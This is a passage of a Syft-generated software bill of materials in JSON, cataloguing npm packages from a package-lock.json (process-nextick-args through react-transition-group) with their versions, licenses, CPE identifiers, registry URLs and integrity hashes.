ft-generated"},{"cpe":"cpe:2.3:a:process_nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process:process-nextick-args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:process:process_nextick_args:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/process-nextick-args@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz","integrity":"sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==","dependencies":null}},{"id":"2485766b0114da33","name":"prop-types","version":"15.8.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:prop-types:prop-types:15.8.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:prop-types:prop_types:15.8.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:prop_types:prop-types:15.8.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:prop_types:prop_types:15.8.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:prop:prop-types:15.8.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:prop:prop_types:15.8.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/prop-types@15.8.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz","integrity":"sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==","dependencies":{"loose-envify":"^1.4.0","object-assign":"^4.1.1","react-is":"^16.13.1"}}},{"id":"685c0e3e50c6553a","name":"proto-list","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:proto-list:proto-list:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto-list:proto_list:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto_list:proto-list:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto_list:proto_list:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto:proto-list:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto:proto_list:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/proto-list@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz","integrity":"sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==","dependencies":null}},{"id":"5add12638aea166c","name":"proto3-json-serializer","version":"2.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:proto3-json-serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3-json-serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3_json_serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3_json_serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3-json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3-json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3_json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3_json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proto3:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/proto3-json-serializer@2.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz","integrity":"sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==","dependencies":{"protobufjs":"^7.2.5"}}},{"id":"a5b5323abf9aae9f","name":"protobufjs","version":"7.5.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:protobufjs_project:protobufjs:7.5.6:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/protobufjs@7.5.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.6.tgz","integrity":"sha512-M71sTMB146U3u0di3yup8iM+zv8yPRNQVr1KK4tyBitl3qFvEGucq/rGDRShD2rsJhtN02RJaJ7j5X5hmy8SJg==","dependencies":{"@protobufjs/aspromise":"^1.1.2","@protobufjs/base64":"^1.1.2","@protobufjs/codegen":"^2.0.5","@protobufjs/eventemitter":"^1.1.0","@protobufjs/fetch":"^1.1.0","@protobufjs/float":"^1.0.2","@protobufjs/inquire":"^1.1.1","@protobufjs/path":"^1.1.2","@protobufjs/pool":"^1.1.0","@protobufjs/utf8":"^1.1.1","@types/node":">=13.7.0","long":"^5.0.0"}}},{"id":"ce10aea6db36304a","name":"proxy-addr","version":"2.0.7","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:proxy-addr:proxy-addr:2.0.7:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy-addr:proxy_addr:2.0.7:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy_addr:proxy-addr:2.0.7:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy_addr:proxy_addr:2.0.7:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy:proxy-addr:2.0.7:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy:proxy_addr:2.0.7:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/proxy-addr@2.0.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz","integrity":"sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==","dependencies":{"forwarded":"0.2.0","ipaddr.js":"1.9.1"}}},{"id":"d0670890e90b35a8","name":"proxy-from-env","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:proxy-from-env:proxy-from-env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy-from-env:proxy_from_env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy_from_env:proxy-from-env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy_from_env:proxy_from_env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy-from:proxy-from-env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy-from:proxy_from_env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy_from:proxy-from-env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy_from:proxy_from_env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy:proxy-from-env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:proxy:proxy_from_env:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/proxy-from-env@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz","integrity":"sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA==","dependencies":null}},{"id":"9616afcfad81bbcd","name":"qrcode","version":"1.5.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:qrcode:qrcode:1.5.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/qrcode@1.5.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/qrcode/-/qrcode-1.5.4.tgz","integrity":"sha512-1ca71Zgiu6ORjHqFBDpnSMTR2ReToX4l1Au1VFLyVeBTFavzQnv5JxMFr3ukHVKpSrSA2MCk0lNJSykjUfz7Zg==","dependencies":{"dijkstrajs":"^1.0.1","pngjs":"^5.0.0","yargs":"^15.3.1"}}},{"id":"baa7b01807110a4c","name":"qs","version":"6.14.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:qs_project:qs:6.14.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/qs@6.14.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/qs/-/qs-6.14.2.tgz","integrity":"sha512-V/yCWTTF7VJ9hIh18Ugr2zhJMP01MY7c5kh4J870L7imm6/DIzBsNLTXzMwUA3yZ5b/KBqLx8Kp3uRvd7xSe3Q==","dependencies":{"side-channel":"^1.1.0"}}},{"id":"994fc27bb4c175c9","name":"qs","version":"6.15.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/qs@6.15.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/qs/-/qs-6.15.1.tgz","integrity":"sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==","dependencies":{"side-channel":"^1.1.0"}}},{"id":"3d2cabf593c9f69a","name":"queue","version":"6.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:queue:queue:6.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/queue@6.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/queue/-/queue-6.0.2.tgz","integrity":"sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA==","dependencies":{"inherits":"~2.0.3"}}},{"id":"254ae16d84fc4780","name":"queue-microtask","version":"1.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:queue-microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:queue-microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:queue_microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:queue_microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:queue:queue-microtask:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:queue:queue_microtask:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/queue-microtask@1.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz","integrity":"sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==","dependencies":null}},{"id":"4bcca27d3d8ccfdd","name":"range-parser","version":"1.2.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:range-parser:range-parser:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:range-parser:range_parser:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:range_parser:range-parser:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:range_parser:range_parser:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:range:range-parser:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:range:range_parser:1.2.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/range-parser@1.2.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz","integrity":"sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==","dependencies":null}},{"id":"62bf6c85ca605f5a","name":"raw-body","version":"2.5.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:raw-body:raw-body:2.5.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:raw-body:raw_body:2.5.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:raw_body:raw-body:2.5.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:raw_body:raw_body:2.5.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:raw:raw-body:2.5.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:raw:raw_body:2.5.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/raw-body@2.5.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/raw-body/-/raw-body-2.5.3.tgz","integrity":"sha512-s4VSOf6yN0rvbRZGxs8Om5CWj6seneMwK3oDb4lWDH0UPhWcxwOWw5+qk24bxq87szX1ydrwylIOp2uG1ojUpA==","dependencies":{"bytes":"~3.1.2","http-errors":"~2.0.1","iconv-lite":"~0.4.24","unpipe":"~1.0.0"}}},{"id":"405f6eb700866b5f","name":"react","version":"18.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:react:react:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/react@18.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/react/-/react-18.3.1.tgz","integrity":"sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ==","dependencies":{"loose-envify":"^1.1.0"}}},{"id":"98bcef2cdcc9941a","name":"react-dom","version":"18.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:react-dom:react-dom:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-dom:react_dom:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_dom:react-dom:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_dom:react_dom:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react-dom:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react_dom:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/react-dom@18.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz","integrity":"sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw==","dependencies":{"loose-envify":"^1.1.0","scheduler":"^0.23.2"}}},{"id":"0db53ea4a0e10790","name":"react-is","version":"16.13.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:react-is:react-is:16.13.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-is:react_is:16.13.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_is:react-is:16.13.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_is:react_is:16.13.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react-is:16.13.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react_is:16.13.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/react-is@16.13.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz","integrity":"sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==","dependencies":null}},{"id":"756017d5bfb89c54","name":"react-is","version":"18.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:react-is:react-is:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-is:react_is:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_is:react-is:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_is:react_is:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react-is:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react_is:18.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/react-is@18.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz","integrity":"sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==","dependencies":null}},{"id":"74a57b2250b339b3","name":"react-promise-suspense","version":"0.3.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:react-promise-suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-promise-suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_promise_suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_promise_suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react-promise-suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react_promise_suspense:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/react-promise-suspense@0.3.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/react-promise-suspense/-/react-promise-suspense-0.3.4.tgz","integrity":"sha512-I42jl7L3Ze6kZaq+7zXWSunBa3b1on5yfvUW6Eo/3fFOj6dZ5Bqmcd264nJbTK/gn1HjjILAjSwnZbV4RpSaNQ==","dependencies":{"fast-deep-equal":"^2.0.1"}}},{"id":"646f82a1b8ded3b2","name":"react-smooth","version":"4.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:react-smooth:react-smooth:4.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-smooth:react_smooth:4.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_smooth:react-smooth:4.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_smooth:react_smooth:4.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react-smooth:4.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react_smooth:4.0.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/react-smooth@4.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/react-smooth/-/react-smooth-4.0.4.tgz","integrity":"sha512-gnGKTpYwqL0Iii09gHobNolvX4Kiq4PKx6eWBCYYix+8cdw+cGo3do906l1NBPKkSWx1DghC1dlWG9L2uGd61Q==","dependencies":{"fast-equals":"^5.0.1","prop-types":"^15.8.1","react-transition-group":"^4.4.5"}}},{"id":"15c7effc6183b848","name":"react-transition-group","version":"4.4.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:react-transition-group:react-transition-group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-transition-group:react_transition_group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_transition_group:react-transition-group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_transition_group:react_transition_group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-transition:react-transition-group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react-transition:react_transition_group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_transition:react-transition-group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react_transition:react_transition_group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react-transition-group:4.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:react:react_transition_group:4.4.5:*:*:*:*:*:*: